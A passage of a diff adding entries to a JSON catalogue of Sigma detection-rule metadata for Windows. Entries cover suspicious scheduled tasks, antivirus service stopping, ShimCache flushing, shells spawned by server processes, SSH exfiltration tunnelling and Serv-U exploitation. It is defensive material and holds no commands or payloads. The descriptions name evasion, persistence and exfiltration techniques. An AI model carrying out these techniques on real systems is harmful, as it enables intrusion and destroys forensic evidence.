"uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "value": "Suspicious Add Scheduled Command Pattern" + }, + { + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate processes that run at logon. Filter according to your environment" + ], + "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "value": "Suspicious Schtasks Schedule Types" + }, + { + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" + ], + "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "value": "Suspicious Schtasks Schedule Type With High Privileges" + }, + { + "description": "schtasks.exe create task from user AppData\\Local\\Temp", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_user_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", + "value": "Suspicious Add Scheduled Task From User AppData Temp" + }, + { + "description": "Detects the creation of scheduled tasks in user session", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "filename": "proc_creation_win_susp_schtask_creation.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" + ] + }, + "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", + "value": "Scheduled Task Creation" + }, + { + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/11", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "value": "Suspicious Scheduled Task Creation Involving Temp Folder" + }, + { + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate use by administrative staff" + ], + "filename": "proc_creation_win_susp_screenconnect_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "value": "ScreenConnect Remote Access" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "GPO" + ], + "filename": "proc_creation_win_susp_screensaver_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "value": "Suspicious ScreenSave Change by Reg.exe" + }, + { + "description": "Detects suspicious file execution by wscript and cscript", + "meta": { + "author": "Michael Haag", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + ], + "filename": "proc_creation_win_susp_script_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "value": "WSF/JSE/JS/VBA/VBE File Execution" + }, + { + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "value": "Script Interpreter Execution From Suspicious Folder" + }, + { + "description": "Detects a suspicious script executions from temporary folder", + "meta": { + "author": "Florian Roth, Max Altgelt, Tim Shelton", + "creation_date": "2021/07/14", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_script_exec_from_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "value": "Suspicious Script Execution From Temp Folder" + }, + { + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_susp_secedit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", + "attack.privilege_escalation", + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" + ] + }, + "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "value": "Potential Suspicious Activity Using SeCEdit" + }, + { + "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "meta": { + "author": "Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "value": "Suspicious Service DACL Modification" + }, + { + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" + }, + { + "description": "Detects a service binary running in a suspicious directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dir.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", + "value": "Suspicious Service Binary Directory" + }, + { + "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", + "value": "Stop Or Remove Antivirus Service" + }, + { + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "meta": { + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_service_path_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", + "value": "Suspicious Service Path Modification" + }, + { + "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Administrator or tools shutting down the services due to upgrade or removal purposes. If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + ], + "filename": "proc_creation_win_susp_service_stop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1489" + ] + }, + "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "value": "Suspicious Stop Windows Service" + }, + { + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" + ] + }, + "uuid": "75578840-9526-4b2a-9462-af469a45e767", + "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" + }, + { + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/14", + "falsepositive": [ + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + ], + "filename": "proc_creation_win_susp_servu_process_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" + ] + }, + "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "value": "Suspicious Serv-U Process Pattern" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_sharpview.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/tevora-threat/SharpView/", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ] + }, + "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "value": "Suspicious Execution of SharpView Aka PowerView" + }, + { + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", + "value": "Suspicious Usage Of ShellExec_RunDLL" + }, + { + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "creation_date": "2021/12/17", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "value": "Suspicious Shells Spawned by Java" + }, + { + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "value": "Suspicious Shells Spawn by Java Utility Keytool" + }, + { + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "meta": { + "author": "FPT.EagleEye Team, wagga", + "creation_date": "2020/12/11", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" + ], + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "value": "Suspicious Shells Spawn by SQL Server" + }, + { + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "creation_date": "2021/05/20", + "falsepositive": [ + "Legitimate WinRM usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "value": "Suspicious Processes Spawned by WinRM" + }, + { + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shimcache_flush.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "b0524451-19af-4efa-a46f-562a977f792e", + "value": "ShimCache Flush" + }, + { + "description": "Use of the commandline to shutdown or reboot windows", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shutdown.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "value": "Suspicious Execution of Shutdown" + }, + { + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_splwow64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "value": "Suspicious Splwow64 Without Params" + }, + { + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "meta": { + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "creation_date": "2021/07/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "value": "Suspicious Spool Service Child Process" + }, + { + "description": "Detects Possible Squirrel Packages Manager as Lolbin", + "meta": { + "author": "Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/11/12", + "falsepositive": [ + "1Clipboard", + "Beaker Browser", + "Caret", + "Collectie", + "Discord", + "Figma", + "Flow", + "Ghost", + "GitHub Desktop", + "GitKraken", + "Hyper", + "Insomnia", + "JIBO", + "Kap", + "Kitematic", + "Now Desktop", + "Postman", + "PostmanCanary", + "Rambox", + "Simplenote", + "Skype", + "Slack", + "SourceTree", + "Stride", + "Svgsus", + "WebTorrent", + "WhatsApp", + "WordPress.com", + "Atom", + "Gitkraken", + "Slack", + "Teams" + ], + "filename": "proc_creation_win_susp_squirrel_lolbin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", + "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", + "value": "Squirrel Lolbin" + }, + { + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_ssh_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "value": "Suspicious SSH Port Forwarding" + }, + { + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_ssh_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "value": "Suspicious SSH Usage RDP Tunneling" + }, + { + "description": "Detects a suspicious svchost process start", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_svchost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "value": "Suspicious Svchost Process" + }, + { + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "meta": { + "author": "David Burkett", + "creation_date": "2019/12/28", + "falsepositive": [ + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + ], + "filename": "proc_creation_win_susp_svchost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", + "value": "Suspect Svchost Activity" + }, + { + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_sysprep_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "value": "Sysprep on AppData Folder" + }, + { + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_systeminfo.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + 